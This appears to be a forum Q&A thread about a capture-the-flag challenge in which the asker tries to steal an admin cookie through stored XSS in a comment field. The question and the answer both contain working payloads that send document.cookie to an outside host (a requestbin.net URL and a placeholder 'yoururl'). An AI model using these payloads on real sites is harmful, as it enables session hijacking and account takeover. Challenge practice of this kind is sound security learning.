# XSS with requestbin.net

Tags: xss

I am trying to steal the admin cookie using an XSS attack for a challenge.

The vulnerable page is a page where a user can post a comment.
When I enter

`<script>alert("ok")</script>`

in the comment field, a pop-up window is displayed.

I then created a requestbin, and enter the following message in the comment field :

`<script>document.write('<img src=\'http://requestbin.net/r/1n1c2rp1?cookie='+document.cookie+'\>admin</img>');</script>`

Unfortunately I am not receiving anything on my requestbin page...

I also tried :

`<img src=x onerror=this.src='http://requestbin.net/r/1n1c2rp1'+document.cookie />`

This also accepted but again I get nothing on requestbin.

Could this be a server error or am I missing something?

Comment: Are you sure there's any cookies? Are you sure they're not marked as [httpOnly](https://stackoverflow.com/questions/3400759/how-can-i-list-all-cookies-for-the-current-page-with-javascript), effectively mitigating your attack?

Comment: The challenge hint says : "steal a session cookie through XSS"

Comment: What does your network tab show? We need more details - any number of site-specific security measures could be getting in the way

Comment: First, check your browser console. It could be anything, probably mixed content error.

Answer (score 2):

You can try to open your browser developer tools (JS console and html view) to see if there is a problem with your JS code or maybe the way your payload is interpreted by the server and then your browser such as characters being escaped.

If you can directly execute JS, then you can do something like this`<script>document.location="http://yoururl/something.php?c=" + document.cookie;</script>` which is easier.